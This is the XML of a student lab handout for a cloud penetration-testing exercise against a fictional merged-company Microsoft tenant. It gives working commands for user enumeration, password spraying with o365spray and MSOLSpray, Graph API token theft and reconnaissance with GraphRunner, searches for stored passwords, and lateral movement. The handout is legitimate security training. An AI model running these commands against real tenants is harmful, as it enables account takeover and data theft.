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Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F1B2D"/>
          <w:sz w:val="84"/>
        </w:rPr>
        <w:t>MERGERMAYHEM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A73E8"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Intro to Cloud Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0D9B76"/>
          <w:sz w:val="24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120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="5F6368"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>STUDENT LAB HANDOUT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Tenant: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OcelotSecurity.onmicrosoft.com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Duration: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45 minutes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Companies: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Ocelot Security + Revolver Industries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Architecture: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Single-tenant, dual business unit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API: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Microsoft Graph API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F1B2D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Cost: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 xml:space="preserve">  $0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  <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1A73E8"/>
              <w:left w:val="single" w:sz="18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22"/>
              </w:rPr>
              <w:t>YOUR MISSION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>Ocelot Security just swallowed Revolver Industries whole — a fast merger, a rushed IT migration, and the kind of chaos that makes a pentester's eyes light up.</w:t>
              <w:br/>
              <w:br/>
              <w:t>Both companies now share one Entra ID tenant: OcelotSecurity.onmicrosoft.com. Separate business units, separate SharePoint sites, separate secrets — but are they really separated?</w:t>
              <w:br/>
              <w:br/>
              <w:t>You've been brought in to find out. Starting from nothing but a company website and your toolkit, your job is to get in, move laterally, and show leadership just how bad the damage could be before a real adversary does it for them.</w:t>
              <w:br/>
              <w:br/>
              <w:t>Rules of engagement: Enumerate, spray, pillage, and pivot. Do not modify or delete accounts. Document everything — your findings become the report that gets budgets approved.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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0FE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r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="0F1B2D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Target Domain:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="E8F0FE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>OcelotSecurity.onmicrosoft.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="E8F0FE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r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="0F1B2D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>OSINT Page:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="E8F0FE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</w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="5F6368"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>https://ocelotsecurity.com/ntir-workshop/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B2D"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>Setup — Install Your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5F6368"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  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Enumeration + spray (Python)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git clone https://github.com/0xZDH/o365spray.git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cd o365spray &amp;&amp; pip3 install -r requirements.txt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Post-exploitation via Graph API (PowerShell)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git clone https://github.com/dafthack/GraphRunner.git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Spray tool (PowerShell alternative)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git clone https://github.com/dafthack/MSOLSpray.git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4680"/>
            <w:shd w:fill="0D9B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1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bottom w:val="single" w:sz="6" w:space="0" w:color="0D9B76"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="0F1B2D"/>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">  OSINT &amp; Reconnaissance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 xml:space="preserve">  ~8 minutes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2"/>
        </w:rPr>
        <w:t>Goal: Gather intelligence from the company website and build a username wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0D9B76"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  1.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Browse the company page: https://ocelotsecurity.com/ntir-workshop/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0D9B76"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  2.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Find employee names and note the naming convention</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0D9B76"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  3.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Look for any email addresses — they reveal the username format</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0D9B76"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  4.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Build your username wordlist based on what you find (e.g., f.last format)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0D9B76"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  5.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Enumerate valid users against OcelotSecurity.onmicrosoft.com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5F6368"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  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Enumerate valid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python3 o365spray.py --enum -U userlist.txt -d OcelotSecurity.onmicrosoft.com --enum-module oauth2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  <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1A73E8"/>
              <w:left w:val="single" w:sz="18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22"/>
              </w:rPr>
              <w:t>RECORD YOUR FINDINGS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>Email format discovered: _____________________________________________</w:t>
              <w:br/>
              <w:br/>
              <w:t>Valid users found: ____________________________________________________</w:t>
              <w:br/>
              <w:br/>
              <w:t>How many valid? ______ out of ______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4680"/>
            <w:shd w:fill="D93B3B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2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bottom w:val="single" w:sz="6" w:space="0" w:color="D93B3B"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="0F1B2D"/>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">  Password Spraying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 xml:space="preserve">  ~10 minutes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2"/>
        </w:rPr>
        <w:t>Goal: Find an account with a weak password. Think about what passwords are common during transitions: temp passwords, seasonal patterns, company names.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5F6368"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  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Spray all valid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python3 o365spray.py --spray -U valid_users.txt -p "Welcome2024!" -d OcelotSecurity.onmicrosoft.com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PowerShell alternative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Import-Module .\MSOLSpray.ps1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Invoke-MSOLSpray -UserList .\valid_users.txt -Password "Welcome2024!"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  <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1A73E8"/>
              <w:left w:val="single" w:sz="18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22"/>
              </w:rPr>
              <w:t>RECORD YOUR FINDINGS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>Compromised account: _________________________________________________</w:t>
              <w:br/>
              <w:br/>
              <w:t>Password used: _______________________________________________________</w:t>
              <w:br/>
              <w:br/>
              <w:t>What defense would stop this? ________________________________________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4680"/>
            <w:shd w:fill="1A73E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3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bottom w:val="single" w:sz="6" w:space="0" w:color="1A73E8"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="0F1B2D"/>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">  Post-Compromise — Graph API Enumeration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 xml:space="preserve">  ~7 minutes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2"/>
        </w:rPr>
        <w:t>Goal: Authenticate as the compromised user and explore the tenant using the Microsoft Graph API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="0F1B2D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Option A: Browser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A73E8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  1.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Go to portal.office.com → sign in with compromised creds</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A73E8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  2.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Navigate to SharePoint → look for accessible sites</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A73E8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  3.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Browse document libraries → download anything interesting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="0F1B2D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Option B: GraphRunner (recommended)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5F6368"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  powershell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Import-Module .\GraphRunner.ps1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Get-GraphTokens  # sign in as compromised user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Invoke-GraphRecon -Tokens $tokens -PermissionEnum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Get-AzureADUsers -Tokens $tokens -OutFile users.txt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Get-SharePointSiteURLs -Tokens $tokens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Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm "password"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F1B2D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Option C: Raw Graph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nsolas" w:hAnsi="Consolas"/>
                <w:color w:val="5F6368"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  powershell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Get OAuth2 token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$body = @{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client_id="1b730954-1685-4b74-9bfd-dac224a7b894"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scope="https://graph.microsoft.com/.default"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username="USER@OcelotSecurity.onmicrosoft.com"; password="PASSWORD"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grant_type="password"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$token = (Invoke-RestMethod -Uri "https://login.microsoftonline.com/OcelotSecurity.onmicrosoft.com/oauth2/v2.0/token" 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-Method POST -Body $body -ContentType "application/x-www-form-urlencoded").access_token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$h = @{ Authorization = "Bearer $token"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List users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(Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/users" -Headers $h).value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ft displayName, userPrincipalName, department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# Search SharePoint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(Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/sites?search=migration" -Headers $h).value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2D2D2D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">      ft displayName, webUrl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  <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1A73E8"/>
              <w:left w:val="single" w:sz="18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22"/>
              </w:rPr>
              <w:t>RECORD YOUR FINDINGS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>SharePoint sites found: _______________________________________________</w:t>
              <w:br/>
              <w:br/>
              <w:t>Interesting files: ____________________________________________________</w:t>
              <w:br/>
              <w:br/>
              <w:t>Credentials or secrets discovered: ____________________________________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4680"/>
            <w:shd w:fill="E88A1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4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bottom w:val="single" w:sz="6" w:space="0" w:color="E88A1A"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="0F1B2D"/>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">  Lateral Movement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 xml:space="preserve">  ~5 minutes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2"/>
        </w:rPr>
        <w:t>Goal: Use the credentials you found to access resources the first user couldn't see.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="E88A1A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  1.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Open an incognito/private browser window</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="E88A1A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  2.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>portal.office.com → sign in with the discovered credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="E88A1A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  3.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Check SharePoint for business-unit-specific sites</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="E88A1A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  4.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Check Power Automate (flow.microsoft.com) for shared flows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="E88A1A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  5.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>What sensitive data can this user see that the first couldn't?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/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1A73E8"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="1A73E8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1A73E8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1A73E8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A73E8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>RECORD YOUR FINDINGS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>New resources accessed: _______________________________________________</w:t>
              <w:br/>
              <w:br/>
              <w:t>Sensitive data found: _________________________________________________</w:t>
              <w:br/>
              <w:br/>
              <w:t>Worst-case business impact: ___________________________________________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496"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="0D9B7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5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Borders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="0D9B76"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="0F1B2D"/>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">  Report Your Findings</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="5F6368"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  ~5 minutes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sz w:val="22"/>
        </w:rPr>
        <w:t>Summarize the attack path. In a real engagement, this becomes your pentest report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F1B2D"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  Initial Access — How did you get in?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  _________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F1B2D"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  Data Discovered — What sensitive data was accessible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  _________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F1B2D"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  Lateral Movement — How did you pivot and to what?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  _________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F1B2D"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  Business Impact — What's the worst-case scenario?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  _________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="0F1B2D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Top 3 Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  1. ______________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  2. ______________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  3. ______________________________________________________________________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B2D"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>Resources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B2D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680"/>
            <w:shd w:fill="0F1B2D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Link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HackTricks Cloud — Azure</w:t>
            </w:r>
          </w:p>
        </w:tc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cloud.hacktricks.xyz/pentesting-cloud/azure-security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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GraphRunner</w:t>
            </w:r>
          </w:p>
        </w:tc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github.com/dafthack/GraphRunner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Graph API Explorer</w:t>
            </w:r>
          </w:p>
        </w:tc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developer.microsoft.com/graph/graph-explorer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Breaching the Cloud (Antisyphon)</w:t>
            </w:r>
          </w:p>
        </w:tc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antisyphontraining.com — pay-what-you-can</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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BadZure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="FFFFFF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github.com/mvelazc0/BadZure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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CARTP (Altered Security)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="F8F9F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</w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>alteredsecurity.com/cartp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0D9B76"/>
          <w:sz w:val="2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i/>
          <w:color w:val="5F6368"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>This lab is for authorized security training only. Only test systems you have explicit permission to assess.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